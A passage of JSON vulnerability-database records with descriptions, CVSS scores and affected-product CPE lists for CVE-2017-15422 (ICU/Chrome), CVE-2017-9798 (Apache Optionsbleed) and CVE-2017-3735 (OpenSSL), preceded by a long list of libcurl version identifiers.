"cpe:2.3:a:haxx:libcurl:7.17.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.42.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.16.4:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.39:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.21.5:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.50.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.10.6:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.28.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.41.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.28.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.46.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.32.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.18.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.45.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.36.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.29.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.25.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.54.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.26.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.43.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.40.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.27.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.9.8:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.15.5:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.15.4:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.9:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.50.3:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.31.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.37.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.21.6:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.50.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.54.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.53.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.34.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.52.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.53.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.37.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.49.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.7:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.55.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.55.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.47.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.8:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.52.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.44.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.33.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.42.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.38.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.10.7:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.10.8:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.49.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.50.1:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.21.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:11:05", "description": "Integer overflow in international date handling in International Components for Unicode (ICU) for C/C++ before 60.1, as used in V8 in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-08-28T19:29:00", "type": "cve", "title": "CVE-2017-15422", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15422"], "modified": "2018-11-07T17:54:00", "cpe": ["cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:redhat:enterprise_linux_server:6.0"], "id": "CVE-2017-15422", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15422", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:00:08", "description": "Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-09-18T15:29:00", "type": "cve", "title": "CVE-2017-9798", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2021-06-06T11:15:00", "cpe": ["cpe:/a:apache:http_server:2.4.18", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.23", "cpe:/a:apache:http_server:2.4.0", "cpe:/a:apache:http_server:2.4.4", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.16", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:apache:http_server:2.4.10", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.27", "cpe:/a:apache:http_server:2.2.34", "cpe:/a:apache:http_server:2.4.17", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.25", "cpe:/a:apache:http_server:2.4.12", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.26"], "id": "CVE-2017-9798", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9798", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T16:39:33", "description": "While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-08-28T19:29:00", "type": "cve", "title": "CVE-2017-3735", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3735"], "modified": "2021-07-20T23:15:00", "cpe": ["cpe:/a:openssl:openssl:0.9.7j", "cpe:/a:openssl:openssl:1.0.1b", "cpe:/a:openssl:openssl:0.9.8t", "cpe:/a:openssl:openssl:0.9.8zb", "cpe:/a:openssl:openssl:1.0.0p", "cpe:/a:openssl:openssl:1.0.1h", "cpe:/a:openssl:openssl:0.9.8l", "cpe:/a:openssl:openssl:1.0.0s", "cpe:/a:openssl:openssl:1.0.0k", "cpe:/a:openssl:openssl:0.9.8b", "cpe:/a:openssl:openssl:1.0.1k", "cpe:/a:openssl:openssl:0.9.8d", "cpe:/a:openssl:openssl:0.9.8g", "cpe:/a:openssl:openssl:1.1.0a", "cpe:/a:openssl:openssl:0.9.8e", "cpe:/a:openssl:openssl:1.0.0a", "cpe:/a:openssl:openssl:1.1.0b", "cpe:/a:openssl:openssl:1.1.0c", "cpe:/a:openssl:openssl:0.9.8u", "cpe:/a:openssl:openssl:1.0.2d", "cpe:/a:openssl:openssl:1.0.0r", "cpe:/a:openssl:openssl:0.9.7k", "cpe:/a:openssl:openssl:1.0.2k", "cpe:/a:openssl:openssl:1.0.2e", "cpe:/a:openssl:openssl:1.0.0e", "cpe:/a:openssl:openssl:1.0.2j", "cpe:/a:openssl:openssl:0.9.8y", "cpe:/a:openssl:openssl:1.0.1a", "cpe:/a:openssl:openssl:0.9.8c", "cpe:/a:openssl:openssl:0.9.8r", "cpe:/a:openssl:openssl:1.0.2", "cpe:/a:openssl:openssl:1.0.0m", "cpe:/a:openssl:openssl:0.9.8za", "cpe:/a:openssl:openssl:1.0.1c", "cpe:/a:openssl:openssl:1.0.2f", "cpe:/a:openssl:openssl:1.1.0f", "cpe:/a:openssl:openssl:1.0.0c", "cpe:/a:openssl:openssl:1.0.0i", "cpe:/a:openssl:openssl:0.9.8s", "cpe:/a:openssl:openssl:0.9.8x", "cpe:/a:openssl:openssl:0.9.8zg", "cpe:/a:openssl:openssl:1.0.0", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/a:openssl:openssl:1.0.1", "cpe:/a:openssl:openssl:0.9.8ze", "cpe:/a:openssl:openssl:1.0.0l", "cpe:/a:openssl:openssl:0.9.8n", "cpe:/a:openssl:openssl:0.9.8a", "cpe:/a:openssl:openssl:1.0.1f", "cpe:/a:openssl:openssl:1.0.0d", "cpe:/a:openssl:openssl:1.0.0j", "cpe:/a:openssl:openssl:1.0.2c", "cpe:/a:openssl:openssl:1.0.0n", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:openssl:openssl:1.0.1i", "cpe:/a:openssl:openssl:1.0.0q", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:openssl:openssl:0.9.7m", "cpe:/a:openssl:openssl:0.9.8w", "cpe:/a:openssl:openssl:1.0.2l", "cpe:/a:openssl:openssl:0.9.8zc", "cpe:/a:openssl:openssl:0.9.8p", "cpe:/a:openssl:openssl:1.0.2i", "cpe:/a:openssl:openssl:1.1.0", "cpe:/a:openssl:openssl:0.9.8", "cpe:/a:openssl:openssl:1.0.2h", "cpe:/a:openssl:openssl:1.0.0b", "cpe:/a:openssl:openssl:1.1.0e", "cpe:/a:openssl:openssl:0.9.8j", "cpe:/a:openssl:openssl:0.9.8z", "cpe:/a:openssl:openssl:0.9.8i", "cpe:/a:openssl:openssl:0.9.8h", "cpe:/a:openssl:openssl:1.0.1e", "cpe:/a:openssl:openssl:0.9.8f", "cpe:/a:openssl:openssl:1.0.0g", "cpe:/a:openssl:openssl:1.0.2a", "cpe:/a:openssl:openssl:0.9.8v", "cpe:/a:openssl:openssl:1.0.0o", "cpe:/a:openssl:openssl:1.0.1l", "cpe:/a:openssl:openssl:1.0.2b", "cpe:/a:openssl:openssl:0.9.8o", "cpe:/a:openssl:openssl:0.9.8m", "cpe:/a:openssl:openssl:1.0.1j", "cpe:/a:openssl:openssl:1.0.0h", "cpe:/a:openssl:openssl:1.0.0f", "cpe:/a:openssl:openssl:1.0.1g", "cpe:/a:openssl:openssl:0.9.8q", "cpe:/a:openssl:openssl:1.1.0d", "cpe:/a:openssl:openssl:0.9.7l", "cpe:/a:openssl:openssl:1.0.1d"], "id": "CVE-2017-3735", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3735", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:openssl:openssl:1.0.0r:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8v:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.1.0e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.7m:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8zb:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8ze:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2i:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0q:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.1.0f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8t:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8za:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.1.0b:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2l:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8z:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8w:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.1.0d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2k:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8y:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8zg:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.1.0c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8zc:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.1.0a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8x:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2j:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.7k:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.7l:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0s:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.0p:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8u:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8m:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.7j:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:04", "description": "\nApple macOS 